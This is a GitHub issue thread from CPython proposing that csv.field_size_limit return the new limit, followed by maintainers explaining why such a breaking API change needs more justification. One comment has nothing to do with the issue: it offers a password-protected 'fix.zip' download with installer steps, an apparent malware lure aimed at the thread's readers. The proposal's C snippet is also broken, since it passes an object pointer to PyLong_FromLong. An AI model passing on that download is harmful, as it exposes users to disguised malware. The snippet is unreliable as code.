### ISSUE TITLE
Change return value of csv.field_size_limit(new_limit) to new_limit

### ISSUE THREAD

**Issue by GregoirePelegrin** [python/cpython#123334]
# Feature or enhancement

### Proposal:

Description
-
As it is now, the `field_size_limit` method from the `csv` module does the following, as per the documentation (emphasis mine):
>_csv.field_size_limit
>
>    new_limit: object = NULL
>
>Sets an upper limit on parsed fields.
>
>    csv.field_size_limit([limit])
>
>Returns <b>old limit</b>. If limit is not given, no new limit is set and the old limit is returned

It seems to me this is a major discrepancy with the majority of such methods, which return the current value (thus the "new" value, if it is a setter). I would propose to change this to match the expected behavior of this type of methods.

Code
-
```c
_csv_field_size_limit_impl(PyObject *module, PyObject *new_limit)
/*[clinic end generated code: output=f2799ecd908e250b input=cec70e9226406435]*/        // Not sure of the numeric values here
{
    _csvstate *module_state = get_csv_state(module);
    long old_limit = module_state->field_limit;
    if (new_limit != NULL) {
        if (!PyLong_CheckExact(new_limit)) {
            PyErr_Format(PyExc_TypeError,
                         "limit must be an integer");
            return NULL;
        }
        module_state->field_limit = PyLong_AsLong(new_limit);
        if (module_state->field_limit == -1 && PyErr_Occurred()) {
            module_state->field_limit = old_limit;
            return NULL;
        }
    }
    return PyLong_FromLong(new_limit);                                                 // Changed from old_limit to new_limit
}
```

### Has this already been discussed elsewhere?

This is a minor feature, which does not need previous discussion elsewhere

**Comment by NhutDang2002** [comment]
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by picnixz** [comment]
First, this would be a breaking change. Second, you say:

> It seems to me this is a major discrepancy with the majority of such methods

AFAICT, this is the only method in the CSV module that sets something and returns. Could you tell me what are the other methods you think about? I can think of `dict.setdefault` which returns the value that either exists or was just inserted, but this is semantically different IMO. Returning the old value from setters that unconditionally set a value seems relevant since we are already passing a value (so we know the new value!). But if we were to temporarily change the limit, then the following pattern is a bit better:

```
old = obj.set_value(new)
# do something with new
...
# restore
obj.set_value(old)
```

than

```
old = obj.get_value()
obj.set_value(new)
# do something with new
...
# restore
obj.set_value(old)
```

In order to avoid opening issues that will be stalled or forgotten, I suggest that you first ask for support on discourse for such matter: https://discuss.python.org/c/ideas/6. Once you've gathered sufficient support, I'll gladly re-open the issue (it is important to note that the request is a breaking change, so discussion is definitely needed, and issues tend to have less impact since less people are viewing it).

Personally I'm not in favor of this change but I'll leave it open for a while (I realized that I'm usually closing feature requetss issues a bit too fast so I'll leave it opened for a day, unless a core dev thinks this should be closed now).

**Comment by terryjreedy** [comment]
Breaking changes require a deprecation period, which is a major nuisance requiring temporary changes to both code and doc.  Such require much more justification than one person's 'expectation'.  Lots of functions could have been defined differently.  I might have expected that getting and setting this module attribute might have been by reference and assignment, `cvs.field_size_limit` and `cvs.field_size_limit = new_limit`.  (I know why not after reading the code to discover that the python code is a facade for _cvs.)  To change an existing API it must be a positive nuisance for multiple people and the change a real pain relief.  Our discuss site is the place to gather evidence of such.  The history of code and doc changes is also a place to look.
